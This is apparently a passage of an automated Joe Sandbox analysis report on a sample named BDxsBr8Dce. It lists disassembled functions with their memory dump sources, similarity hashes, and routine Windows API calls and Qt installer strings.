                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8
                                                                                                            • API String ID: 0-4194326291
                                                                                                            • Opcode ID: 8a6c358415730d1ce8c456e3af435813cdad52bf8cca3a91362b5a48c46bf526
                                                                                                            • Instruction ID: 6453848967b4055348e3b2afa846d4740cfea262b9d919653572b6c1648db03e
                                                                                                            • Opcode Fuzzy Hash: 8a6c358415730d1ce8c456e3af435813cdad52bf8cca3a91362b5a48c46bf526
                                                                                                            • Instruction Fuzzy Hash: 59617972A002059FEB64CF1CD8847D9BBE4FF89328F04426AF998C7690D7B1D995CB81
                                                                                                            APIs
                                                                                                            • ?lexer@Engine@QQmlJS@@QBEPAVLexer@2@XZ.BDXSBR8DCE ref: 00BFCDE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ?lexer@Engine@Lexer@2@
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 1098866180-4108050209
                                                                                                            • Opcode ID: cf5ad36996449acde6bf9f9b92e6c79bf4afdc6687e6bef2fb3a4b343a4a1f4f
                                                                                                            • Instruction ID: e012899b18245f77a71dd116d92b1680872b5bb41e4f67d3c198d91b871f461c
                                                                                                            • Opcode Fuzzy Hash: cf5ad36996449acde6bf9f9b92e6c79bf4afdc6687e6bef2fb3a4b343a4a1f4f
                                                                                                            • Instruction Fuzzy Hash: BC715E709043458FDB54CF18C4C0A66BBF5FF99320F1582A9ED588F29AEB30E995CB90
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memmove
                                                                                                            • String ID: invalid string position$string too long
                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                            • Opcode ID: f3d6c1db7d5cc5eddfbda8d8aa1bcbb8da6000073a2afd1f376aad9b12b3d48b
                                                                                                            • Instruction ID: 438d78777d3f7ed349c8eb222c2b52cd5e4a24966ee16eff2a146f8d8850c157
                                                                                                            • Opcode Fuzzy Hash: f3d6c1db7d5cc5eddfbda8d8aa1bcbb8da6000073a2afd1f376aad9b12b3d48b
                                                                                                            • Instruction Fuzzy Hash: DB4124323003118BCF24DE5CD880A6AF3AAEB91791B11C92EE18A87652D7769A40D7A1
                                                                                                            APIs
                                                                                                            • ?uiObjectMemberCast@UiObjectMember@AST@QQmlJS@@UAEPAV123@XZ.BDXSBR8DCE(EA29BAA6), ref: 007F8987
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Cast@MemberMember@V123@
                                                                                                            • String ID: %1/%2$.exe
                                                                                                            • API String ID: 565989161-1734052415
                                                                                                            • Opcode ID: 5b43cf0c29fbdb850239666baba0e7c8e3a89817b805aacfc77fde8c0aa7b5a6
                                                                                                            • Instruction ID: 8d9a350f90b77503474a86bb1aab052a43dc1ff1863f5ef363d62030b5ede705
                                                                                                            • Opcode Fuzzy Hash: 5b43cf0c29fbdb850239666baba0e7c8e3a89817b805aacfc77fde8c0aa7b5a6
                                                                                                            • Instruction Fuzzy Hash: 8A41E6706043019BDA18DB18DC56F2A73D4EF95B24F044A1EFA569B3D1EB789C0587A3
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(?,SHGetStockIconInfo), ref: 00AB70A5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID: SHGetStockIconInfo$shell32
                                                                                                            • API String ID: 190572456-1498023473
                                                                                                            • Opcode ID: 2312efec61a0ac086170f0d46274c16ecbbc581d1735d87e81ad69d869a9a3b7
                                                                                                            • Instruction ID: dceb03ae8885c6a4e24732e751554255696a9e7f0b666d30346f93320d07aff2
                                                                                                            • Opcode Fuzzy Hash: 2312efec61a0ac086170f0d46274c16ecbbc581d1735d87e81ad69d869a9a3b7
                                                                                                            • Instruction Fuzzy Hash: 313106706083019FD724EF78D856B9F77E4AF81314F84485EF5999B2D3DBB498088B62
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __aulldvrm
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 1302938615-4108050209
                                                                                                            • Opcode ID: d60b0a7763c4672fc8eef81d332fb04aac1f3501ed9a0a468894b337a4e28937
                                                                                                            • Instruction ID: c80c5efaf63a24357abc51d11865c2d97b3f49ca2c507e4aabe514dfd1fbc0bb
                                                                                                            • Opcode Fuzzy Hash: d60b0a7763c4672fc8eef81d332fb04aac1f3501ed9a0a468894b337a4e28937
                                                                                                            • Instruction Fuzzy Hash: 0D2129757043448FE374DE2CC990B6AB7EAEFC8218F54482DE6C987241D734AC458B93
                                                                                                            APIs
                                                                                                            • _memmove.LIBCMT ref: 00F88D0F
                                                                                                              • Part of subcall function 01107314: _malloc.LIBCMT ref: 01107320
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _malloc_memmove
                                                                                                            • String ID: VUUU$VUUU
                                                                                                            • API String ID: 1183979061-3149182767
                                                                                                            • Opcode ID: d6d94a078c46e77a1255b74371a5f446638358b31b05b376485b2a683f9ce06c
                                                                                                            • Instruction ID: 62ed98a0a21b437206bf501ae1da7122603814b6ad30ab8fd37b05fa38c569ed
                                                                                                            • Opcode Fuzzy Hash: d6d94a078c46e77a1255b74371a5f446638358b31b05b376485b2a683f9ce06c
                                                                                                            • Instruction Fuzzy Hash: 492159716001098FD718DF5CC880A55B3E9FF98358B68886EE589CB342EB72ED57DB90
                                                                                                            APIs
                                                                                                              • Part of subcall function 00840310: std::exception::exception.LIBCMT ref: 0084036D
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0084568A
                                                                                                              • Part of subcall function 011041A5: RaiseException.KERNEL32(?,?,00000001,01579490,?,?,?,?,?,00F70BE2,00000001,01579490), ref: 011041FA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionException@8RaiseThrowstd::exception::exception
                                                                                                            • String ID: Could not create temporary file$QInstaller
                                                                                                            • API String ID: 4171481480-1283681866
                                                                                                            • Opcode ID: 8afb59a96b0b8cab98a044a941c2c39615967e429312544b610311d5abf9cc56
                                                                                                            • Instruction ID: 2e3f9575c4d3277b215afd9737816997b5d33226cb3d52cf57620e258fcff4ae
                                                                                                            • Opcode Fuzzy Hash: 8afb59a96b0b8cab98a044a941c2c39615967e429312544b610311d5abf9cc56
                                                                                                            • Instruction Fuzzy Hash: 8F218DB4508345ABD705DB28CC82F5BB7E4BF94724F404A0CF865972D2DB78E9088B52
                                                                                                            APIs
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0078B92F
                                                                                                              • Part of subcall function 011041A5: RaiseException.KERNEL32(?,?,00000001,01579490,?,?,?,?,?,00F70BE2,00000001,01579490), ref: 011041FA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionException@8RaiseThrow
                                                                                                            • String ID: Cannot open file %1 for reading: %2$QInstaller
                                                                                                            • API String ID: 3976011213-369985780
                                                                                                            • Opcode ID: d320e755b768fb896a1c5fbe16549a500d97d8782c3d83de3c1d428beaf9ff7a
                                                                                                            • Instruction ID: 7e907f8f755430a3da8cc335d1c9ee235e828a5b7f525c588bb5d42589512f02
                                                                                                            • Opcode Fuzzy Hash: d320e755b768fb896a1c5fbe16549a500d97d8782c3d83de3c1d428beaf9ff7a
                                                                                                            • Instruction Fuzzy Hash: 9D118E71218340AFD714DB69CC85F5BB7E8BB89714F400A1DF895D3381DBB8E9048B62
                                                                                                            Strings
                                                                                                            • QQmlParser, xrefs: 00C239AE
                                                                                                            • Invalid regular expression flag '%0', xrefs: 00C239A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Invalid regular expression flag '%0'$QQmlParser
                                                                                                            • API String ID: 0-4235388840
                                                                                                            • Opcode ID: d143ab103599723c0de60a74bb8b76b6497fea71c57182522dedb8aa0287badf
                                                                                                            • Instruction ID: f82eef7bd1f83728056a5023c697cdc1575e9db745647f11c4d0b80068ad18a1
                                                                                                            • Opcode Fuzzy Hash: d143ab103599723c0de60a74bb8b76b6497fea71c57182522dedb8aa0287badf
                                                                                                            • Instruction Fuzzy Hash: B7112334214352BBD308AB28C804BA6B7A4FF01708F80011DF8A48BBD0D7ADEE96C795
                                                                                                            APIs
                                                                                                              • Part of subcall function 01016790: GetModuleHandleW.KERNEL32(kernel32,?,01016688), ref: 010167A1
                                                                                                              • Part of subcall function 01016790: GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 010167B1
                                                                                                              • Part of subcall function 01016790: QueryPerformanceFrequency.KERNEL32(00000000,?,01016688), ref: 010167C0
                                                                                                            • GetTickCount.KERNEL32 ref: 010166A8
                                                                                                            • QueryPerformanceCounter.KERNEL32(00000000), ref: 010166D7
                                                                                                            Strings
                                                                                                            • QueryPerformanceCounter failed, although QueryPerformanceFrequency succeeded., xrefs: 010166F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$AddressCountCounterFrequencyHandleModuleProcTick
                                                                                                            • String ID: QueryPerformanceCounter failed, although QueryPerformanceFrequency succeeded.
                                                                                                            • API String ID: 3248421294-4065940233
